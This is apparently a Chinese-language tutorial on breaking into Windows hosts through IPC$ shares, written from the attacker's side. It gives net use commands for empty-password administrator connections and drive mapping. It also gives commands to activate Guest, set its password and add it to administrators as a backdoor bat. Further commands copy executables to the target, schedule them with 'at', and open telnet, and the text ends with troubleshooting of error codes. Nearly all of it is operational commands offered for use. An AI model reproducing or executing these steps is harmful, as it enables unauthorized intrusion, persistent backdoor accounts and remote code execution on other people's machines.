cmd net use

前提条件

启动服务

首先保证目标的IPC服务启动，服务为lanmanWorkstation，显示名为Workstations

端口

telnet目标计算机lanmanWorkstation服务的两个端口，即139和445

telnet ip 139

telnet ip 445

启动目标IPC共享

这些要在目标计算机下执行

net share ipc$

关闭

net share ipc$ /del

步骤

建立ipc$连接

net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)

net use \\222.222.221.102\ipc$ "" /user:"administrator"

删除一个ipc$连接

net use \\IP\ipc$ /del

映射远程共享:

net use z: \\IP\Disk$

net use z: \\222.222.221.102\d$

删除共享映射

net use z: /del 删除映射的c盘，其他盘类推
net use * /del 删除全部,会有提示要求按y确认

查看远程主机的共享资源（但看不到默认共享） 
net view \\IP

添加以后登录账号(以下命令要在目标主机执行，目标主机重启后可用)

查看用户名

net user

查看帐户的属性

net user 帐户名

激活Guest用户

net user guest /active:yes

修改Guest密码

net user guest 123456

Guest变为Administrator

net localgroup administrators guest /add

可以将

net user guest /active:yes

net user guest 123456

net localgroup administrators guest /add

写成bat拷贝到目标计算机去执行。

远程执行bat

1.向远程主机复制文件 
copy \路径\srv.exe \\IP\共享目录名，如： 
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

2.远程添加执行计划任务 
at \\ip 时间 程序名，如： 
at \\127.0.0.0 11:00 love.exe 
注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径

可以用同开启权限的方式去开启telnet服务，然后telnet目标主机

目标主机开启了telnet的话可以

telnet 目标IP

输入刚才留的账户和密码

失败原因

1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
根据返回的错误号分析原因：
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows 无法找到网络路径 : 网络有问题；
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。
错误号1326，未知的用户名或错误密码 ： 原因很明显了；
错误号1327，用户账户限制阻止了此用户进行登录；

错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。